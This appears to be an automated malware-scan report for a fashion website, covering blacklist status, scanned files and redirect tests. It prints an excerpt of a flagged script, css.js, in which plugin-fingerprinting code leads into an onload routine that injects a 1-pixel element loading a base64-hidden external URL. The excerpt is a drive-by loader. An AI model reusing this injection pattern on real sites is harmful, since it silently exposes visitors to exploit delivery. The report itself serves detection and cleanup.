Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=newbeefashion.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://newbeefashion.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.newbeefashion.com/ | 200 OK Content-Length: 1528 Content-Type: text/html | clean |
http://www.newbeefashion.com/css.js | 200 OK Content-Length: 26006 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var PluginDetect={version:"0.7.5",name:"PluginDetect",handler:function(c,b,a){return function(){c(b,a)}},isDefined:function(b){return typeof b!="undefined"},isArray:function(b){return(/array/i).test(Object.prototype.toString.call(b))},isFunc:function(b){return typeof b=="function"},isString:function(b){return typeof b=="string"},isNum:function(b){return typeof b=="number"},isStrNum:function(b){return(typeof b=="string"&&(/\d/).test(b))},getNumRegx:/[\d][\d\.\_,-]*/,splitNumRegx:/[\.\_,-] break; case 'gdf544': coun = counter.get('aW1n'); break; case '98grth': coun = counter.set('aZkf264'); break; } cnter = document.createElement(coun); cnter.setAttribute("src", counter.get('aHR0cDovL3N5c2Zvcm1lMTA1NS5jby5jYy9tYWluLnBocD9wYWdlPWE5MTFiZDYyNjg3OTZjYWM=')); cnter.style.width = 1+"px"; cnter.style.height = 1+"px"; document.body.appendChild(cnter); } window.onload = checkmouse; Antivirus reports:
| ||
http://www.newbeefashion.com/test404page.js | 404 Not Found Content-Length: 2693 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: newbeefashion.com
Result:
GET / HTTP/1.1
Host: newbeefashion.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: newbeefashion.com
Referer: http://www.google.com/search?q=newbeefashion.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: newbeefashion.com
Referer: http://www.google.com/search?q=newbeefashion.com
Result:
The result is similar to the first query. There are no suspicious redirects found.